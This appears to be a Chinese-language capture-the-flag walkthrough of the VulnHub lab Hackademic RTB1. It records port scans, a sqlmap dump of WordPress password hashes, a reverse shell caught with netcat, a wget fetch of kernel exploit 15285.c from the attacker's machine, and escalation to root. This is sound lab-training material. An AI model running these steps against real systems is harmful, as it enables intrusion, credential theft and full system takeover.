HACKADEMIC: RTB1
https://www.vulnhub.com/entry/hackademic-rtb1,17/
扫描主机
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:15:01]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.8
Host is up (0.00057s latency).
nmap扫描
7.93 ( https://nmap.org ) at 2023-03-15 15:15 CST
Nmap scan report for 192.168.54.8
Host is up (0.00093s latency).
Not shown: 65515 filtered tcp ports (no-response), 18 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:26] C:1
$ sudo nmap -sT -sV -O -p22,80 192.168.54.8
[sudo] yunki 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.22 - 2.6.36
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:40]
$ sudo nmap -sU -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT STATE SERVICE
22/udp filtered ssh
80/udp filtered http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:55]
$ sudo nmap --script=vuln -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:17 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.8
Host is up (0.00059s latency).
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:01:8A:4D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 170.89 seconds
web渗透
目录扫描
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:08]
$ dirb http://192.168.54.8/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 15 15:19:13 2023
URL_BASE: http://192.168.54.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.8/ ----
+ http://192.168.54.8/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.54.8/index.html (CODE:200|SIZE:1475)
+ http://192.168.54.8/phpmyadmin (CODE:403|SIZE:290)
+ http://192.168.54.8/phpMyAdmin (CODE:403|SIZE:290)
-----------------
END_TIME: Wed Mar 15 15:19:24 2023
DOWNLOADED: 4612 - FOUND: 4
# 他告诉我们target是这个http://192.168.54.8/Hackademic_RTB1/
在dirb扫一下这个目录
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:41:06]
$ dirb http://192.168.54.8/Hackademic_RTB1/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 15 15:41:20 2023
URL_BASE: http://192.168.54.8/Hackademic_RTB1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.8/Hackademic_RTB1/ ----
+ http://192.168.54.8/Hackademic_RTB1/index.php (CODE:500|SIZE:1881)
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-admin/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-content/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-images/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-includes/
+ http://192.168.54.8/Hackademic_RTB1/xmlrpc.php (CODE:200|SIZE:42)
---- Entering directory: http://192.168.54.8/Hackademic_RTB1/wp-admin/ ----
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/index.php (CODE:302|SIZE:0)
-----------------
END_TIME: Wed Mar 15 15:41:44 2023
DOWNLOADED: 9224 - FOUND: 4
访问网页,发现192.168.54.8/Hackademic_RTB1/?cat=1有sql注入,直接sqlmap跑。
sqlmap
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:55]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" --current-db --batch
current database: 'wordpress'
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:58]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
Database: wordpress
[9 tables]
+-------------------+
| wp_categories |
| wp_comments |
| wp_linkcategories |
| wp_links |
| wp_options |
| wp_post2cat |
| wp_postmeta |
| wp_posts |
| wp_users |
+-------------------+
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:01]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:14]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_nickname,user_pass,user_level --dump --batch
Database: wordpress
Table: wp_users
[6 entries]
+---------------+---------------------------------------------+------------+
| user_nickname | user_pass | user_level |
+---------------+---------------------------------------------+------------+
| NickJames | 21232f297a57a5a743894a0e4a801fc3 (admin) | 1 |
| MaxBucky | 50484c19f1afdaf3841a0d821ed393d2 (kernel) | 0 |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3) | 10 |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell) | 0 |
| TonyBlack | a6e514f9486b83cb53d8d932f9a04292 (napoleon) | 0 |
| JohnSmith | b986448f0bb9e5e124ca91d3d650f52c | 0 |
+---------------+---------------------------------------------+------------+
这里,根据字段的内容,我选取了比较重要的用户名,密码和等级等信息。这里可以发现GeorgeMille的权限最高,这里尝试使用该用户登录wp后台吧。访问这个http://192.168.54.8/Hackademic_RTB1/wp-admin/,直接被重定向到登录页面。
通过浏览网页发现,这里可以编辑php,写一个反弹shell试试。
开启端口监听。访问http://192.168.54.8/Hackademic_RTB1/wp-content/plugins/hello.php
# yunki @ yunki in ~ [16:02:39]
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.8] 47172
bash: no job control in this shell
bash-4.0$ whoami
whoami
apache
权限提升
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
bash-4.0$ uname -r
uname -r
2.6.31.5-127.fc12.i686
kali
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:34:32]
$ searchsploit 2.6.3 | grep "Privilege Escalation"
Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) | linux/local/44677.rb
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3) | linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit) | linux/local/19933.rb
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1) | linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation | linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation | linux_x86-64/local/15024.c
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation | linux/local/9191.txt
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation | linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4) | linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation | linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation | linux/local/15704.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1) | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | linux/local/35161.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1) | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2) | linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation | linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | linux/local/15774.c
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation | linux/local/12130.py
(好多啊,这里用了好多个都不行,最后使用Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation 成功了 TAT)
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:03]
$ searchsploit -m 15285.c
Exploit: Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/15285
Path: /usr/share/exploitdb/exploits/linux/local/15285.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/yunki/vulnhub/HackademicRTB1/15285.c
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:09]
$ php -S 0:80
[Wed Mar 15 16:36:16 2023] PHP 7.4.15 Development Server (http://0:80) started
靶机
bash-4.0$ wget http://192.168.54.128/15285.c
wget http://192.168.54.128/15285.c
--2023-03-15 01:59:35-- http://192.168.54.128/15285.c
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/x-c]
Saving to: `15285.c.1'
0K ...... 100% 618M=0s
2023-03-15 01:59:35 (618 MB/s) - `15285.c.1' saved [7155/7155]
bash-4.0$ gcc 15285.c -o 15285
gcc 15285.c -o 15285
bash-4.0$ chmod +x 15285
chmod +x 15285
bash-4.0$ ./15285
./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:01:8a:4d brd ff:ff:ff:ff:ff:ff
inet 192.168.54.8/24 brd 192.168.54.255 scope global eth0
inet6 fe80::20c:29ff:fe01:8a4d/64 scope link
valid_lft forever preferred_lft forever
扫一扫
2228
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
